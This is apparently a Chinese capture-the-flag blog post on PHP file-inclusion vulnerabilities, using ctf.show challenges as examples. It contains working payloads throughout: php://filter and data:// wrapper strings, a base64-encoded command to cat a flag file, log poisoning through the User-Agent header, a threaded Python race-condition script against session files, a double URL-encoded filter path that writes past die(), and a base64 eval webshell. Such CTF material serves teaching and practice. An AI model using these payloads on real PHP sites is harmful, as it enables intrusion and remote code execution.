本文共 3057 字,大约阅读时间需要 10 分钟。
本文以ctf.show网站题目为例,总结ctf中的文件包含漏洞
?file=php://filter/convert.base64-encode/resource=flag.php
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===>
日志文件路径:?file=/var/log/nginx/access.log
apache2:/var/log/apache2/access.log 直接访问会显示User-Agent的信息: 写入php文件,进行getshell 注意:访问日志文件只会显示前几次访问情况,要查看当前访问情况需要再一次访问https://blog.csdn.net/weixin_45669205/article/details/113709363
原理:
添加一个Cookie:PHPSESSID=flag 并在PHP_SESSION_UPLOAD_PROGRESS下添加一句话木马
PHP将会在服务器上创建一个会话文件:/tmp/sess_flag (这里我们猜测session文件默认存储位置为/tmp)
在题目页面进行?file=/tmp/sess_flag传参并抓包 两边同时爆破,触发竞争 得到文件名,再次爆破读文件 lonmar佬的通杀脚本:# -*- coding: utf-8 -*-# @author:lonmarimport ioimport requestsimport threadingsessID = 'flag'url = 'http://167fff40-d240-4032-b724-1da8660ec305.chall.ctf.show:8080/'def write(session): while event.isSet(): f = io.BytesIO(b'a' * 1024 * 50) response = session.post( url, cookies={ 'PHPSESSID': sessID}, data={ 'PHP_SESSION_UPLOAD_PROGRESS': ' '}, files={ 'file': ('test.txt', f)} )def read(session): while event.isSet(): response = session.get(url + '?file=/tmp/sess_{}'.format(sessID)) if 'test' in response.text: print(response.text) event.clear() else: print('[*]retrying...')if __name__ == '__main__': event = threading.Event() event.set() with requests.session() as session: for i in range(1, 30): threading.Thread(target=write, args=(session,)).start() for i in range(1, 30): threading.Thread(target=read, args=(session,)).start()
https://xz.aliyun.com/t/8163#toc-3
https://www.leavesongs.com/PENETRATION/php-filter-magic.htmlfile_put_contents(urldecode($file), " ".$content);
因为存在die()或exit(),导致即使我们成功写入一句话,也执行不了。
利用base64解码,将死亡代码解码成乱码,使得php引擎无法识别
先用伪协议准备好写入的文件1.php
php://filter/write=convert.base64-decode/resource=1.php
因为存在urldecode($file)
所以需要url双编码:
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
POST木马:
//PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ICA/Pg==
因为base64算法解码时是4个byte一组,所以给他增加2个“a”一共8个字符。这样,"phpdieaa"被正常解码,而后面我们传入的webshell的base64内容也被正常解码。结果就是<?php die; ?>没有了。
如果是phpexit就只要增加1个a
访问1.php即可